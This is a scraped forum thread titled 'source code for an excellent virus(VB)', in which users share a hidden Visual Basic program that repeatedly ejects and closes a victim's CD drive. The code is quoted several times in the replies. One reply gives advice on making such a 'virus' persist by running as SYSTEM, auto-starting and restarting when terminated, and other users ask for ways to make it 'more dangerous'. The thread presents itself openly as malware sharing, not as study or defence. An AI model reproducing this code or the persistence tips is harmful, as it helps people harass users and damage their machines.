source code for an excellent virus(VB)
- treborguile
- Posts: 53
- Joined: Thu Aug 23, 2007 2:22 am
- Location: sniping area
- jack krauser
- Posts: 1005
- Joined: Wed Aug 29, 2007 5:45 pm
- Location: greece
- Contact:
you mean to broke his computertreborguile wrote:that is really not the way of the hacker.
hacker is a life style. its one that alters how you think, you perception of reality, your way of dealing with things in general, as well as things so common as how you talk, how you carry yourself, and even when and how long you sleep.
by Loyal_Dark
by Loyal_Dark
- jack krauser
- Posts: 1005
- Joined: Wed Aug 29, 2007 5:45 pm
- Location: greece
- Contact:
hehehe<<D.A.>> wrote:it's ain't the way of a hacker... IT'S THE WAY OF A CRAZY PSYCHO!!!!!!
hacker is a life style. its one that alters how you think, you perception of reality, your way of dealing with things in general, as well as things so common as how you talk, how you carry yourself, and even when and how long you sleep.
by Loyal_Dark
by Loyal_Dark
- treborguile
- Posts: 53
- Joined: Thu Aug 23, 2007 2:22 am
- Location: sniping area
- jack krauser
- Posts: 1005
- Joined: Wed Aug 29, 2007 5:45 pm
- Location: greece
- Contact:
hey do you know any other good virus? not faketreborguile wrote:hahahahahajack krauser wrote:hehehe<<D.A.>> wrote:it's ain't the way of a hacker... IT'S THE WAY OF A CRAZY PSYCHO!!!!!!
hacker is a life style. its one that alters how you think, you perception of reality, your way of dealing with things in general, as well as things so common as how you talk, how you carry yourself, and even when and how long you sleep.
by Loyal_Dark
by Loyal_Dark
- jack krauser
- Posts: 1005
- Joined: Wed Aug 29, 2007 5:45 pm
- Location: greece
- Contact:
Re: .
what do you mean it didn't work?koolpop0 wrote:cdaudio don't work for me help?
hacker is a life style. its one that alters how you think, you perception of reality, your way of dealing with things in general, as well as things so common as how you talk, how you carry yourself, and even when and how long you sleep.
by Loyal_Dark
by Loyal_Dark
Re: source code for an excellent virus(VB)
Oke, bro ... This code work 100%. But, if you use this code:treborguile wrote:Ok this virus is very nasty...it causes the CD drive 2 eject and load at intervals of 2 seconds,u cant stop it directly.......it can even damage ur CD drives....ok here goes the code ....this shud b coded in VB.....
Private Declare Function mciSendString Lib "winmm.dll" Alias _
"mciSendStringA" (ByVal lpstrCommand As String, ByVal lpstrReturnString As String, _
ByVal uReturnLength As Long, ByVal hwndCallback As Long) As Long
Dim retvalue As Long
Private Sub Form_Load()
Form1.Hide
t.interval=2000
End Sub
Private Sub t_Timer()
Static a As Boolean
a = Not (a)
Select Case a
Case True
retvalue = mciSendString("set CDAudio door open", returnstring, 127, 0)
Case False
retvalue = mciSendString("set CDAudio door closed", returnstring, 127, 0)
End Select
End Sub
1. Computer'll be slower.
2. You cann't put another code, like code to make virus duplicate. Because, program'll focus to this code.
If you wan't make powerfull virus i've some tricks. Make virus like KSPoold (can login as system). And make it to start automaticly. So, if user terminate it, it'll start again. Then, put your code more free. Because, your virus'll save!! (You won't put the lock task manager code)
Hackers Center Forum
I've never been able to work out detailed plans of what the future was going to be like... I just said " I'm going to fight, Who knows where I'll get? "
I've never been able to work out detailed plans of what the future was going to be like... I just said " I'm going to fight, Who knows where I'll get? "
- jack krauser
- Posts: 1005
- Joined: Wed Aug 29, 2007 5:45 pm
- Location: greece
- Contact:
Re: source code for an excellent virus(VB)
any other tricks?Necklord wrote:Oke, bro ... This code work 100%. But, if you use this code:treborguile wrote:Ok this virus is very nasty...it causes the CD drive 2 eject and load at intervals of 2 seconds,u cant stop it directly.......it can even damage ur CD drives....ok here goes the code ....this shud b coded in VB.....
Private Declare Function mciSendString Lib "winmm.dll" Alias _
"mciSendStringA" (ByVal lpstrCommand As String, ByVal lpstrReturnString As String, _
ByVal uReturnLength As Long, ByVal hwndCallback As Long) As Long
Dim retvalue As Long
Private Sub Form_Load()
Form1.Hide
t.interval=2000
End Sub
Private Sub t_Timer()
Static a As Boolean
a = Not (a)
Select Case a
Case True
retvalue = mciSendString("set CDAudio door open", returnstring, 127, 0)
Case False
retvalue = mciSendString("set CDAudio door closed", returnstring, 127, 0)
End Select
End Sub
1. Computer'll be slower.
2. You cann't put another code, like code to make virus duplicate. Because, program'll focus to this code.
If you wan't make powerfull virus i've some tricks. Make virus like KSPoold (can login as system). And make it to start automaticly. So, if user terminate it, it'll start again. Then, put your code more free. Because, your virus'll save!! (You won't put the lock task manager code)
hacker is a life style. its one that alters how you think, you perception of reality, your way of dealing with things in general, as well as things so common as how you talk, how you carry yourself, and even when and how long you sleep.
by Loyal_Dark
by Loyal_Dark
Re: source code for an excellent virus(VB)
Use private lib (vb)jack krauser wrote:any other tricks?Necklord wrote:Oke, bro ... This code work 100%. But, if you use this code:treborguile wrote:Ok this virus is very nasty...it causes the CD drive 2 eject and load at intervals of 2 seconds,u cant stop it directly.......it can even damage ur CD drives....ok here goes the code ....this shud b coded in VB.....
Private Declare Function mciSendString Lib "winmm.dll" Alias _
"mciSendStringA" (ByVal lpstrCommand As String, ByVal lpstrReturnString As String, _
ByVal uReturnLength As Long, ByVal hwndCallback As Long) As Long
Dim retvalue As Long
Private Sub Form_Load()
Form1.Hide
t.interval=2000
End Sub
Private Sub t_Timer()
Static a As Boolean
a = Not (a)
Select Case a
Case True
retvalue = mciSendString("set CDAudio door open", returnstring, 127, 0)
Case False
retvalue = mciSendString("set CDAudio door closed", returnstring, 127, 0)
End Select
End Sub
1. Computer'll be slower.
2. You cann't put another code, like code to make virus duplicate. Because, program'll focus to this code.
If you wan't make powerfull virus i've some tricks. Make virus like KSPoold (can login as system). And make it to start automaticly. So, if user terminate it, it'll start again. Then, put your code more free. Because, your virus'll save!! (You won't put the lock task manager code)
Hackers Center Forum
I've never been able to work out detailed plans of what the future was going to be like... I just said " I'm going to fight, Who knows where I'll get? "
I've never been able to work out detailed plans of what the future was going to be like... I just said " I'm going to fight, Who knows where I'll get? "
- jack krauser
- Posts: 1005
- Joined: Wed Aug 29, 2007 5:45 pm
- Location: greece
- Contact:
Re: source code for an excellent virus(VB)
what is private lib? it's a programme?Necklord wrote:Use private lib (vb)jack krauser wrote:any other tricks?Necklord wrote: Oke, bro ... This code work 100%. But, if you use this code:
1. Computer'll be slower.
2. You cann't put another code, like code to make virus duplicate. Because, program'll focus to this code.
If you wan't make powerfull virus i've some tricks. Make virus like KSPoold (can login as system). And make it to start automaticly. So, if user terminate it, it'll start again. Then, put your code more free. Because, your virus'll save!! (You won't put the lock task manager code)
hacker is a life style. its one that alters how you think, you perception of reality, your way of dealing with things in general, as well as things so common as how you talk, how you carry yourself, and even when and how long you sleep.
by Loyal_Dark
by Loyal_Dark
- treborguile
- Posts: 53
- Joined: Thu Aug 23, 2007 2:22 am
- Location: sniping area
Re: source code for an excellent virus(VB)
hahaha upgrading it will be nicejack krauser wrote:what is private lib? it's a programme?Necklord wrote:Use private lib (vb)jack krauser wrote: any other tricks?
post ur ideas guys to make this virus more dangerous...
- jack krauser
- Posts: 1005
- Joined: Wed Aug 29, 2007 5:45 pm
- Location: greece
- Contact:
Re: source code for an excellent virus(VB)
more dangeroustreborguile wrote:hahaha upgrading it will be nicejack krauser wrote:what is private lib? it's a programme?Necklord wrote: Use private lib (vb)
post ur ideas guys to make this virus more dangerous...
hacker is a life style. its one that alters how you think, you perception of reality, your way of dealing with things in general, as well as things so common as how you talk, how you carry yourself, and even when and how long you sleep.
by Loyal_Dark
by Loyal_Dark